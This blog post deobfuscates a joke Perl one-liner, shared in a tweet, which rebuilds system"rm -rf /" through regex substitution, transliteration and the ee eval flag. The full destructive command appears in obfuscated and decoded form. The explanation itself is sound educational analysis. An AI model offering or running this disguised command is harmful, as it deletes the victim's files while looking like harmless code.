Understanding the meme perl oneliner

Yesterday, I came across this tweet which was an anecdote about sexism in tech, but which included a line of obfuscated code that our villain presumably executed locally and caused them to "lose everything":

Me and other nerds who saw this tweet, though, were drawn to the obfuscated code snippet, and were puzzled as to what it actually meant:

echo "hello world" | perl -e '$??s:;s:s;;$?::s;;=]=>^-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

The short, but boring, explanation is that it tells your shell to execute rm -rf /, a command that, when executed by a sufficiently privileged user, deletes every file in your system1.

Some of the replies to the tweet also linked to a more complete explanation at https://www.dlitz.net/stuff/malicious-perl-sig/, but even that explanation was insufficient to me, and I wanted to be able to give a satisfactory explanation in a Discord I was in, so I cracked open the perldoc pages and started reading things. This post is basically a nicer version of the explanation.

High level overview

Here is the snippet, once again but in a code block:

> echo "hello world" | perl -e '$??s:;s:s;;$?::s;;=]=>^-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

This is a line in bourne shell (the standard shell on, uh, non-Windows systems) that will produce the innocent sequence of characters hello world and feed it into an invocation of perl, with a oneline script provided to it. The script proceeds to (attempt to) delete all files in your computer. How did this happen?

Prior knowledge

Perl is a language that was designed as an amalgamation of various languages and mini-languages that were routinely used by unix system administrators like sh (bourne shell), awk and sed; this includes a lot of their idiosyncracies. It is very optimized for handling plain text, and if what you're doing fits easily into its idiosyncrasies, perl allows you to be very terse indeed, which helped build its infamy as an obfuscated language, and some of those are important for understanding the code:

Understanding the code

Now, to help explain this, I'll try to rewrite some of the confusing notation into easier to read notation. I'll add whitespace where possible and replace the regexp separators with the / most people are used to; this requires added escaping but it should still feel more familiar.

First off, at no point in the script is the hello world input actually read. A lot of perl oneliners do implicitly read the input, but this one is missing the -s or -p options and doesn't do an explicit read either so it simply doesn't. It's a complete red herring.

Now, for the first part of the snippet:

$? ? s/;s/s;;$?/ :

This is actually a regular C-style ternary. The predicate is the $? global, which holds the status code of the last external command executed in the script; since nothing has been executed yet, this is a 0, which is a falsy constant. This means the ? branch is never taken, this always goes to :, everything here serves no function other than to look confusing... again.

s//=]=>%-{<-|}<&|`{/;

This is the expression in the : side mentioned above, and it is a regular expression substitution operator, similar to a common sed invocation; here a few of the idiosyncrasies mentioned earlier come into play.

There is no input or output provided to the command, so it operates on the $_ global, which is empty at this point. The pattern portion of the regexp, in between the first two /, is empty, so it will repeat the last matched regexp, but no regexp has matched before so it will be an actual empty match, and will be substituted with the text in the substitution part of the operator.

This is really just a fancy way of writing $_ = '=]=>%-{<-|}<&|`{'.

The big trick

y/ -\/:-@[-`{-}/`-{\/" -/;

This is the really complicated part, and it is what does the actual transforming of the string that was prepared on the previous instruction. It's not highlighted correctly either 😅

This is the transliteration operator, and it behaves similarly to the tr unix command.

This will build a list of input characters and a list of output characters, and will do a 1-to-1 mapping between them in order. When building the list, you can specify a start and end character range by separating them with a -3. Repeated input characters are ignored, and each character is only translated once.

To begin with, let's look at a simple example: tr a-z n-za-m, which is a (lowercase-only) rot13 implementation. It builds a list with each character from a to z, and replaces each character with the corresponding character 13 letters down the alphabet. a-z expands to abcdefghijklmnopqrstuvwxyz, and n-za-m expands to nopqrstuvwxyzabcdefghijklm, and the mapping is positional; so a becomes n, b becomes o, d becomes q, z becomes m, etc, according to this table:

abcdefghijklmnopqrstuvwxyz ->
nopqrstuvwxyzabcdefghijklm

The actual translation done by the snippet is a lot more complicated and it abuses the specific layout of the standard ASCII table4. Here is one, with the first 2 rows (control characters) omitted, and using to represent a space character:

0 1 2 3 4 5 6 7 8 9 A B C D E F
2 ! " # $ % & ' ( ) * + , - . /
3 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
4 @ A B C D E F G H I J K L M N O
5 P Q R S T U V W X Y Z [ \ ] ^ _
6 ` a b c d e f g h i j k l m n o
7 p q r s t u v w x y z { | } ~

The snippet's translation is, naturally, overly complicated, and uses multiple ranges, exploiting the way they are arranged to turn punctuation into text.

There are four ranges in the input side, ␣-/:-@[-`{-} , and here is how they look arranged in the ASCII table:

0 1 2 3 4 5 6 7 8 9 A B C D E F
2 ! " # $ % & ' ( ) * + , - . /
3 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
4 @ A B C D E F G H I J K L M N O
5 P Q R S T U V W X Y Z [ \ ] ^ _
6 ` a b c d e f g h i j k l m n o
7 p q r s t u v w x y z { | } ~

The output transliteration guide is `-{/"-, and here is how they look in the table, colored according to how the characters are defined in the output section:

0 1 2 3 4 5 6 7 8 9 A B C D E F
2 ! " # $ % & ' ( ) * + , - . /
3 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
4 @ A B C D E F G H I J K L M N O
5 P Q R S T U V W X Y Z [ \ ] ^ _
6 ` a b c d e f g h i j k l m n o
7 p q r s t u v w x y z { | } ~

As one can see, the size of the groups does not need at all be equal between them. Note also that the last - is simply a -, and is not interpreted as a range due to its position. The only important part is that both the input and the output section include the same amount of characters5, 32 in this case.

To help visualize the trickery involved, here is once again the output layout, but colored according to how the ranges are declared in the input section:

0 1 2 3 4 5 6 7 8 9 A B C D E F
2 ! " # $ % & ' ( ) * + , - . /
3 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
4 @ A B C D E F G H I J K L M N O
5 P Q R S T U V W X Y Z [ \ ] ^ _
6 ` a b c d e f g h i j k l m n o
7 p q r s t u v w x y z { | } ~

Here is the actual translation table that gets generated:

␣!"#$%&'()*+,-./:;<=>?@[\]^_`{|} ->
`abcdefghijklmnopqrstuvwxyz{/"␣-

Once again, as the operator was not given a target, it reads from and writes to $_, and the current content of $_ is =]=>%-{<-|}<&|`{. Let's just translate it ourselves, going from left to right on the input table6:

StepCurrent result
input=]=>%-{<-|}<&|`{
the % becomes e=]=>e-{<-|}<&|`{
the & becomes f=]=>e-{<-|}<f|`{
all - become m=]=>em{<m|}<f|`{
all = become ss]s>em{<m|}<f|`{
the < becomes rs]s>em{rm|}rf|`{
all = become ss]s>em{rm|}rf|`{
the > becomes ts]stem{rm|}rf|`{
the ] becomes ysystem{rm|}rf|`{
the ` becomes a /system{rm|}rf|/{
all { become "system"rm|}rf|/"
all | become spacessystem"rm }rf /"
the } becomes a -system"rm -rf /"

This is the ultimate result of the translation, and the system"rm -rf /" is the "shellcode" of this script. This is the code that will attempt to execute rm -rf /, but it is not code yet, just text.

See

s//$_/see

This is what does the eval of the shellcode. This is once again a substitution operator, but this time there are flags at the end.

The s flag is completely irrelevant here7 and once again a distraction; it does help disguise the ee flag and make it look like an english word ("see").

Now, what is the ee flag?8 It changes how the operator works completely: instead of doing a simple substitution, it will take the substitution string's result and eval it (interpret it as code).

If you recall, this substitution has no target so it will work on the $_ global. It matches an empty pattern due to still hitting the corner case of pattern repetition, and substitutes it with the contents of $_. If this operator did not have the ee flag, it would simply duplicate the contents of $_, but with this flag, it will take the substitution string, which is the current content of $_, and eval it. The content of which is the system"rm -rf /" that was constructed by the y/.../.../ transliteration.

This oneliner is a very convoluted way of writing perl -e 'system"rm -rf /"'.

system"rm -rf /"

Finally, the code that gets evaled is simply calling the system global function with the "rm -rf /" string as the first argument, with nothing syntactically weird here other than the lack of a space, which perl happens to not require.

Conclusion?

This was an interesting exercise, and I learned a lot more about the y/// operator than I ever expected to learn in my life without this one puzzle. Hopefully the explanation makes sense!


1

Or tries to. The GNU coreutils implementation, at least, will detect and guard against this exact invocation, demanding that you also provide the --no-preserve-root argument, but this snippet is certainly older than this little bit of defense.

2

/ is still the most popular separator, followed by @ when there's a lot of embedded /s so you don't have to escape as much. Perl uniquely also supports balanced braces instead of separators, like s{pattern}{substitution}.

3

To include a literal - in the translation, it needs to either be overlapped by a range, or be the first/last character of the translation.

4

Perl, amazingly, has EBCDIC support, and would do the correct EBCDIC thing in EBCDIC systems if it can tell, at compile time, that the character ranges are purely alphanumeric.

5

If the replacement section has fewer characters than the input, the last character is repeated to fit; if it has more characters than needed, then the extra characters are ignored.

6

This is certainly not how the translation is actually done in code; a real implementation probably scans the string left-to-right and replaces one character at a time. Going by table order makes for a better story, though!

7

The "single line" flag, it's used to ignore newlines inside the string being processed for the purposes of the ^ and $ metacharacters, making them only match the start and end of the entire string.

8

And why is ee a single flag anyway? There's actually a e already, which does execute code, but it is compile-time checked code. The second e is what makes it "more eval". If the s//$_/ RE only had e as a flag, it'd evaluate only the variable access $_ as code, not the result of the variable access.